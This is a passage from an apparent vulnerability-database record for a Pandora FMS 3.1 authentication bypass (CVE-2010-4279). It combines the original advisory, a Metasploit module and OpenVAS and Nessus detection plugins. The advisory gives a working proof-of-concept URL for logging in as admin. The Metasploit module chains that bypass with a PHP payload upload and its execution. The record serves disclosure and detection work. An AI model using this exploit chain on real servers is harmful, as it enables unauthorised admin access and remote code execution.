arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems. Also it is\r\npossible to bypass the authentication or scale privileges to became\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact to the confidentiality, integrity,\r\nand availability of the system.\r\n\r\n\r\n[+] Systems affected\r\n\r\nVersions prior and including 3.1 of Pandora FMS are affected\r\n\r\n\r\n[+] Solution\r\n\r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n\r\n\r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\r\n\r\n\r\n[+] Timeline\r\n\r\nAgo 2010: First contact to vendor\r\nAgo 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released on October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n\r\n\r\n[+] References\r\n\r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\r\n\r\n\r\n[+] Credits\r\n\r\nThese vulnerabilities has been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\r\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\r\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\r\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\r\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\r\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\r\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\r\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\r\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\r\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\r\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\r\nsn9vRJk4gc/PozOXDjC3\r\n=WmOh\r\n-----END PGP SIGNATURE-----\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/15639/"}], "cve": [{"lastseen": "2017-11-09T11:54:28", "bulletinFamily": "NVD", "description": "tasks/feed/readRSS.cfm in Mura CMS before 6.2 allows attackers to bypass intended access restrictions by leveraging the \"draggable feeds\" feature.", "modified": "2017-11-08T08:50:24", "published": "2017-10-19T15:29:00", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-15639", "id": "CVE-2017-15639", "type": "cve", "title": "CVE-2017-15639", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-11T11:34:18", "bulletinFamily": "NVD", "description": "The default configuration of Pandora FMS 3.1 and earlier specifies an empty string for the loginhash_pwd field, which allows remote attackers to bypass authentication by sending a request to index.php with \"admin\" in the loginhash_user parameter, in conjunction with the md5 hash of \"admin\" in the loginhash_data parameter.", "modified": "2018-10-10T16:07:57", "published": "2010-12-02T12:15:00", "id": "CVE-2010-4279", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4279", "title": "CVE-2010-4279", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T15:59:55", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-70305", "id": "SSV:70305", "title": "Pandora FMS <= 3.1 Authentication Bypass", "type": "seebug", "sourceData": "\n [+] Introduction\r\n\r\nPandora FMS (for Pandora Flexible Monitoring System) is a software\r\nsolution for monitoring computer networks. It allows monitoring in a\r\nvisual way the status and performance of several parameters from\r\ndifferent operating systems, servers, applications and hardware systems\r\nsuch as firewalls, proxies, databases, web servers or routers.\r\n\r\nIt can be deployed in almost any operating system. It features remote\r\nmonitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use\r\nagents. An agent is available for each platform. It can also monitor\r\nhardware systems with a TCP/IP stack, such as load balancers, routers,\r\nnetwork switches, printers or firewalls.\r\n\r\nThis software has several servers that process and get information from\r\ndifferent sources, using WMI for gathering remote Windows information, a\r\npredictive server, a plug-in server which makes complex user-defined\r\nnetwork tests, an advanced export server to replicate data between\r\ndifferent sites of Pandora FMS, a network discovery server, and an SNMP\r\nTrap console.\r\n\r\nReleased under the terms of the GNU General Public License, Pandora FMS\r\nis free software.\r\n\r\n\r\n[+] Description and Proof of Concept\r\n\r\n\r\n1) Authentication bypass - CVE-2010-4279 - CVSS: 10/10\r\n\r\nAn attacker could access to any account user, including admin, using the\r\n&#34;hash login&#34; authentication process. This kind of authentication method\r\nworks providing a username and a hash. The issue could be exploited\r\nremotely providing a username and the md5 of it when\r\n$config[&#39;loginhash_pwd&#39;] is empty, that in fact is the default\r\nconfiguration.\r\n\r\nSnippet of vulnerable code in index.php:\r\n\r\n136 // Hash login process\r\n137 if (! isset ($config[&#39;id_user&#39;]) && isset ($_GET[&#34;loginhash&#34;])) {\r\n138 $loginhash_data = get_parameter(&#34;loginhash_data&#34;, &#34;&#34;);\r\n139 $loginhash_user = get_parameter(&#34;loginhash_user&#34;, &#34;&#34;);\r\n140\r\n141 if ($loginhash_data ==\r\nmd5($loginhash_user.$config[&#34;loginhash_pwd&#34;])) {\r\n142 logon_db ($loginhash_user, $_SERVER[&#39;REMOTE_ADDR&#39;]);\r\n143 $_SESSION[&#39;id_usuario&#39;] = $loginhash_user;\r\n144 $config[&#34;id_user&#34;] = $loginhash_user;\r\n\r\n\r\n\r\nProof of concept:\r\n\r\nhttp://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1\r\n\r\nGot it! admin! :)\r\n\r\nBy default, any installation of this software allows unauthenticated\r\nattackers to perform an authentication bypass and a privilege escalation\r\nto admin.\r\n\r\n\r\n1.1) Additionally, a manual modification in order to use the hash_hmac\r\nfunction instead of the weak statement md5 ( $string . $KEY) is\r\nencouraged for security purposes.\r\n\r\nSnippet of code (index.php, version 3.1.1):\r\n\r\n145 // Hash login process\r\n(...)\r\n150 if ($config[&#34;loginhash_pwd&#34;] != &#34;&#34; && $loginhash_data ==\r\nmd5($loginhash_user.$config[&#34;loginhash_pwd&#34;])) {\r\n\r\nIn line 150, use\r\nhash_hmac(&#34;sha256&#34;,$loginhash_user,$config[&#34;loginhash_pwd&#34;]), instead of\r\nmd5($lioginhash_user.$config[&#34;loginhash_pwd&#34;])\r\n\r\n\r\n[+] Impact\r\n\r\nAn attacker can execute commands of the operating system, inject remote\r\ncode in the context of the application, get arbitrary files from the\r\nfilesystem or extract any data of the database including passwords and\r\nconfidential information about the monitored network/systems. Also it is\r\npossible to bypass the authentication or scale privileges to became\r\nadmin, gaining full control of the web application and web server. These\r\nvulnerabilities have a high impact to the confidentiality, integrity,\r\nand availability of the system.\r\n\r\n\r\n[+] Systems affected\r\n\r\nVersions prior and including 3.1 of Pandora FMS are affected\r\n\r\n\r\n[+] Solution\r\n\r\nApply the security fix for version 3.1:\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download\r\n\r\n\r\nOr upgrade to version 3.1.1 from\r\nhttp://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/\r\n\r\n\r\n[+] Timeline\r\n\r\nAgo 2010: First contact to vendor\r\nAgo 2010: Confirmation of vendor\r\nSept 2010: Second contact: SQL Injection vulnerabilities\r\nSept 2010: Confirmation that the fix will be released on October\r\nOct 2010: PandoraFMS security patch for 3.1 version released\r\nOct 2010: Request for CVE numbers\r\nNov 2010: PandoraFMS version 3.1.1 released\r\nNov 2010: Disclosure of this advisory\r\n\r\n\r\n[+] References\r\n\r\nOfficial PandoraFMS site: http://pandorafms.org/\r\nSourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/\r\nWikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS\r\nCommon Vulnerability Scoring System (CVSS) v2 calculator:\r\nhttp://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\r\nCommon Vulnerabilities and Exposures (CVE): http://cve.mitre.org/\r\n\r\n\r\n[+] Credits\r\n\r\nThese vulnerabilities has been discovered by Juan Galiana Lara -\r\n@jgaliana - http://juangaliana.blogspot.com/\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niQIcBAEBAgAGBQJM9NctAAoJEJaV5RMdiDI7cTMP/jzyDB8hcuTGYy+hHnehx0Fy\r\nYbVmWTMCUhIHZ6Y6ke1xLbFf0itFm/tMSvqC/20cAKC0x+QEmEVoSJPerT+Fc/3s\r\nIVjIEMxBbaKNM6inAElng5BzC0MTOjI+njtpF7pmLaIFBy8C77+u/LNrSM7tucy9\r\nWIx6ILVGSO0LY5vfgwdRAcJow6p/wn50U4Ur2XOVZ/X10Gbsb+9qMd4+q1d87Cw4\r\ncC+mqTefLeP8FNh6PB2tJpdpQqJ3R2G8719fHgmDm/5SVBkoXZRhjHKokR9+wtzP\r\nJPJWP3z1Zt+Wtn3+ANakDItBenbgafM2lMe0tkiy9LoQKMKepibLqOf9xfrKqTnP\r\n8CRffcV8nLorGBoKk7UKVb3I14llt34cu+Vcx2+WgDz37hXV1iK7pufGuFxVVRE4\r\n7etidHR9n7gO1WPbLmrKq4rrR02zhYnAHsGwjtFQId3ufRGSBTno3yNHFj1j0EvH\r\npARhwbRtjIiSk8JF3TjeTswGMpCIItpQ051K4Bcpbtzte7fX05CLoaF6xyJBJlS5\r\nyNuxaBnGZYVOvUd+emosH+5ngW7Qk8/wXljx2OyVOu6ip75UZ277MRLBJvlq+NC4\r\noBllQOzv521fd5hkgYEQ8VZQgWCzbeRTuh+t4z+MUHKTQlcE2I0ba9C6xdn0nkZF\r\nsn9vRJk4gc/PozOXDjC3\r\n=WmOh\r\n-----END PGP SIGNATURE-----\r\n\n ", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-70305"}], "metasploit": [{"lastseen": "2019-04-13T08:00:59", "bulletinFamily": "exploit", "description": "This module exploits an authentication bypass vulnerability in Pandora FMS v3.1 as disclosed by Juan Galiana Lara. It also integrates with the built-in pandora upload which allows a user to upload arbitrary files to the '/images/' directory. This module was created as an exercise in the Metasploit Mastery Class at Blackhat that was facilitated by egypt and mubix.", "modified": "2017-07-24T13:26:21", "published": "2013-12-03T13:23:56", "id": "MSF:EXPLOIT/MULTI/HTTP/PANDORA_UPLOAD_EXEC", "href": "", "type": "metasploit", "title": "Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits an authentication bypass vulnerability in Pandora FMS v3.1 as\n disclosed by Juan Galiana Lara. It also integrates with the built-in pandora\n upload which allows a user to upload arbitrary files to the '/images/' directory.\n\n This module was created as an exercise in the Metasploit Mastery Class at Blackhat\n that was facilitated by egypt and mubix.\n\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Juan Galiana Lara', # Vulnerability discovery\n 'Raymond Nunez <rcnunez[at]upd.edu.ph>', # Metasploit module\n 'Elizabeth Loyola <ecloyola[at]upd.edu.ph>', # Metasploit module\n 'Fr330wn4g3 <Fr330wn4g3[at]gmail.com>', # Metasploit module\n '_flood <freshbones[at]gmail.com>', # Metasploit module\n 'mubix <mubix[at]room362.com>', # Auth bypass and file upload\n 'egypt <egypt[at]metasploit.com>', # Auth bypass and file upload\n ],\n 'References' =>\n [\n ['CVE', '2010-4279'],\n ['OSVDB', '69549'],\n ['BID', '45112']\n ],\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' =>\n [\n ['Automatic Targeting', { 'auto' => true }]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Nov 30 2010\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The path to the web application', '/pandora_console/']),\n ])\n end\n\n def check\n\n base = target_uri.path\n\n # retrieve software version from login page\n begin\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(base, 'index.php')\n })\n if res and res.code == 200\n #Tested on v3.1 Build PC100609 and PC100608\n if res.body.include?(\"v3.1 Build PC10060\")\n return Exploit::CheckCode::Appears\n elsif res.body.include?(\"Pandora\")\n return Exploit::CheckCode::Detected\n end\n end\n return Exploit::CheckCode::Safe\n rescue ::Rex::ConnectionError\n vprint_error(\"Connection failed\")\n end\n return Exploit::CheckCode::Unknown\n\n end\n\n # upload a payload using the pandora built-in file upload\n def upload(base, file, cookies)\n data = Rex::MIME::Message.new\n data.add_part(file, 'application/octet-stream', nil, \"form-data; name=\\\"file\\\"; filename=\\\"#{@fname}\\\"\")\n data.add_part(\"Go\", nil, nil, 'form-data; name=\"go\"')\n data.add_part(\"images\", nil, nil, 'form-data; name=\"directory\"')\n data.add_part(\"1\", nil, nil, 'form-data; name=\"upload_file\"')\n data_post = data.to_s\n data_post = data_post.gsub(/^\\r\\n\\-\\-\\_Part\\_/, '--_Part_')\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'index.php'),\n 'cookie' => cookies,\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'vars_get' => {\n 'sec' => 'gsetup',\n 'sec2' => 'godmode/setup/file_manager',\n },\n 'data' => data_post\n })\n\n register_files_for_cleanup(@fname)\n return res\n end\n\n def exploit\n\n base = target_uri.path\n @fname = \"#{rand_text_numeric(7)}.php\"\n cookies = \"\"\n\n # bypass authentication and get session cookie\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(base, 'index.php'),\n 'vars_get' => {\n 'loginhash_data' => '21232f297a57a5a743894a0e4a801fc3',\n 'loginhash_user' => 'admin',\n 'loginhash' => '1',\n },\n })\n\n # fix if logic\n if res and res.code == 200\n if res.body.include?(\"Logout\")\n cookies = res.get_cookies\n print_good(\"Login Bypass Successful\")\n print_status(\"cookie monster = \" + cookies)\n else\n fail_with(Failure::NotVulnerable, \"Login Bypass Failed\")\n end\n end\n\n # upload PHP payload to images/[fname]\n print_status(\"Uploading PHP payload (#{payload.encoded.length} bytes)\")\n php = %Q|<?php #{payload.encoded} ?>|\n begin\n res = upload(base, php, cookies)\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Connection failed\")\n end\n\n if res and res.code == 200\n print_good(\"File uploaded successfully\")\n else\n fail_with(Failure::UnexpectedReply, \"#{peer} - Uploading PHP payload failed\")\n end\n\n # retrieve and execute PHP payload\n print_status(\"Executing payload (images/#{@fname})\")\n begin\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(base, 'images', \"#{@fname}\")\n }, 1)\n rescue ::Rex::ConnectionError\n fail_with(Failure::Unreachable, \"#{peer} - Connection failed\")\n end\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/pandora_upload_exec.rb"}], "openvas": [{"lastseen": "2017-07-02T21:09:51", "bulletinFamily": "scanner", "description": "Pandora FMS is prone to an authentication-bypass vulnerability as well\nas the following input-validation vulnerabilities:\n\n1. A command-injection vulnerability\n2. Multiple SQL-injection vulnerabilities\n3. A remote file-include vulnerability\n4. An arbitrary PHP-code-execution vulnerability\n5. Multiple local file-include vulnerabilities\n\nAttackers may exploit these issues to execute local and remote script\ncode in the context of the affected application, compromise the\napplication, obtain sensitive information, access or modify data,\nexploit latent vulnerabilities in the underlying database, and gain\nadministrative access to the affected application.\n\nVersions prior and including Pandora FMS 3.1 are vulnerable.", "modified": "2017-02-17T00:00:00", "published": "2010-12-01T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=100927", "id": "OPENVAS:100927", "title": "Pandora FMS Authentication Bypass And Multiple Input Validation Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_pandora_fms_45112.nasl 5323 2017-02-17 08:49:23Z teissa $\n#\n# Pandora FMS Authentication Bypass And Multiple Input Validation Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_summary = \"Pandora FMS is prone to an authentication-bypass vulnerability as well\nas the following input-validation vulnerabilities:\n\n1. A command-injection vulnerability\n2. Multiple SQL-injection vulnerabilities\n3. A remote file-include vulnerability\n4. An arbitrary PHP-code-execution vulnerability\n5. Multiple local file-include vulnerabilities\n\nAttackers may exploit these issues to execute local and remote script\ncode in the context of the affected application, compromise the\napplication, obtain sensitive information, access or modify data,\nexploit latent vulnerabilities in the underlying database, and gain\nadministrative access to the affected application.\n\nVersions prior and including Pandora FMS 3.1 are vulnerable.\";\n\ntag_solution = \"Updates are available. Please see the reference for more details.\";\n\nif (description)\n{\n script_id(100927);\n script_version(\"$Revision: 5323 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-17 09:49:23 +0100 (Fri, 17 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-12-01 14:30:53 +0100 (Wed, 01 Dec 2010)\");\n script_bugtraq_id(45112);\n script_cve_id(\"CVE-2010-4278\",\"CVE-2010-4279\",\"CVE-2010-4280\",\"CVE-2010-4281\",\"CVE-2010-4282\",\"CVE-2010-4283\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_name(\"Pandora FMS Authentication Bypass And Multiple Input Validation Vulnerabilities\");\n\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"gb_pandora_fms_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_xref(name : \"URL\" , value : \"https://www.securityfocus.com/bid/45112\");\n script_xref(name : \"URL\" , value : \"http://pandorafms.org/index.php?sec=project&sec2=home&lng=en\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/514939\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"version_func.inc\");\n \nport = get_http_port(default:80);\nif(!get_port_state(port))exit(0);\nif(!can_host_php(port:port))exit(0);\n\nif(!dir = get_dir_from_kb(port:port, app:\"pandora_fms\"))exit(0);\nurl = string(dir, \"/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1\"); \n\nif(http_vuln_check(port:port, url:url,pattern:\"This is your last activity in Pandora FMS console\",extra_check:make_list(\":: Administration ::\",\":: Operation ::\"))) {\n \n security_message(port:port);\n exit(0);\n\n}\n\nexit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-16T12:39:00", "bulletinFamily": "scanner", "description": "Pandora FMS is prone to an authentication-bypass vulnerability as well\n as the following input-validation vulnerabilities:\n\n 1. A command-injection vulnerability\n\n 2. Multiple SQL-injection vulnerabilities\n\n 3. A remote file-include vulnerability\n\n 4. An arbitrary PHP-code-execution vulnerability\n\n 5. Multiple local file-include vulnerabilities", "modified": "2019-05-14T00:00:00", "published": "2010-12-01T00:00:00", "id": "OPENVAS:1361412562310100927", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100927", "title": "Pandora FMS Authentication Bypass And Multiple Input Validation Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Pandora FMS Authentication Bypass And Multiple Input Validation Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100927\");\n script_version(\"2019-05-14T08:13:05+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 08:13:05 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2010-12-01 14:30:53 +0100 (Wed, 01 Dec 2010)\");\n script_bugtraq_id(45112);\n script_cve_id(\"CVE-2010-4278\", \"CVE-2010-4279\", \"CVE-2010-4280\", \"CVE-2010-4281\", \"CVE-2010-4282\", \"CVE-2010-4283\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Pandora FMS Authentication Bypass And Multiple Input Validation Vulnerabilities\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"gb_pandora_fms_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"pandora_fms/installed\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the reference for more details.\");\n\n script_tag(name:\"summary\", value:\"Pandora FMS is prone to an authentication-bypass vulnerability as well\n as the following input-validation vulnerabilities:\n\n 1. A command-injection vulnerability\n\n 2. Multiple SQL-injection vulnerabilities\n\n 3. A remote file-include vulnerability\n\n 4. An arbitrary PHP-code-execution vulnerability\n\n 5. Multiple local file-include vulnerabilities\");\n\n script_tag(name:\"impact\", value:\"Attackers may exploit these issues to execute local and remote script\n code in the context of the affected application, compromise the\n application, obtain sensitive information, access or modify data,\n exploit latent vulnerabilities in the underlying database, and gain\n administrative access to the affected application.\");\n\n script_tag(name:\"affected\", value:\"Versions prior and including Pandora FMS 3.1 are vulnerable.\");\n\n script_xref(name:\"URL\", value:\"https://www.securityfocus.com/bid/45112\");\n script_xref(name:\"URL\", value:\"http://pandorafms.org/index.php?sec=project&sec2=home&lng=en\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/514939\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"version_func.inc\");\n\nport = get_http_port(default:80);\n\nif(!dir = get_dir_from_kb(port:port, app:\"pandora_fms\"))\n exit(0);\n\nurl = string(dir, \"/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1\");\nif(http_vuln_check(port:port, url:url,pattern:\"This is your last activity in Pandora FMS console\",extra_check:make_list(\":: Administration ::\",\":: Operation ::\"))) {\n report = report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-02-21T01:14:09", "bulletinFamily": "scanner", "description": "The Pandora FMS console hosted on the remote web server is affected by an authentication bypass vulnerability. The 'auto login (hash) password' feature allows third parties to authenticate using a combination of username and a shared secret. This shared secret is undefined by default, which means it is possible to authenticate solely by providing the hash of a valid username.\n\nA remote attacker can exploit this issue to access the console as admin.\n\nThis version of Pandora FMS is also affected by other vulnerabilities;\nhowever, Nessus has not tested for those issues.", "modified": "2018-07-24T00:00:00", "id": "PANDORA_FMS_AUTH_BYPASS.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=50861", "published": "2010-12-01T00:00:00", "title": "Pandora FMS Console Authentication Bypass", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(50861);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/24 18:56:10\");\n\n script_cve_id(\"CVE-2010-4279\");\n script_bugtraq_id(45112);\n script_xref(name:\"EDB-ID\", value:\"15639\");\n\n script_name(english:\"Pandora FMS Console Authentication Bypass\");\n script_summary(english:\"Attempts to access the console as admin.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"A web console on the remote host is affected by an authentication\nbypass vulnerability.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Pandora FMS console hosted on the remote web server is affected by\nan authentication bypass vulnerability. The 'auto login (hash) password'\nfeature allows third parties to authenticate using a combination of\nusername and a shared secret. This shared secret is undefined by\ndefault, which means it is possible to authenticate solely by\nproviding the hash of a valid username.\n\nA remote attacker can exploit this issue to access the console as\nadmin.\n\nThis version of Pandora FMS is also affected by other vulnerabilities;\nhowever, Nessus has not tested for those issues.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://openideas.info/smf/index.php/topic,1825.0.html\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://openideas.info/smf/index.php/topic,2083.0.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Apply the security fix for Pandora FMS 3.1, or upgrade to version\n3.1.1 or later.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/11/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:artica:pandora_fms\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 